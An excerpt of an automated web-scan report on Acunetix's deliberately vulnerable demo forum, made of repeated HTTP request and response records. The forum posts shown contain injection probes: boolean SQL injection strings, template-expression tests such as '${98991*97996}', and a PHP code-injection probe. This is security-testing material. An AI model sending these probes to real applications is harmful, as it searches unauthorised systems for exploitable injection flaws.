3+497-497-1=0+0+0+1 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3+497-497-1=0+0+0+1 - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=24 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4144 |
Response Body - size: 4,144 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>${@print(md5(31337))}</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=25 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4189 |
Response Body - size: 4,189 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum acx[[${98991*97996}]]xca </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/acx[[${98991*97996}]]xca </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>acx[[${98991*97996}]]xca - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=26 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4186 |
Response Body - size: 4,186 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3*2<(0+5+497-497) </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3*2<(0+5+497-497) </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3*2<(0+5+497-497) - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=27 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4145 |
Response Body - size: 4,145 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>${@print(md5(31337))}\</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=28 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4192 |
Response Body - size: 4,192 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum acx__${98991*97996}__::.x </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/acx__${98991*97996}__::.x </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>acx__${98991*97996}__::.x - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=29 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4186 |
Response Body - size: 4,186 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3*2>(0+5+497-497) </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3*2>(0+5+497-497) </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3*2>(0+5+497-497) - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=3 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4203 |
Response Body - size: 4,203 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3+627-627-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" 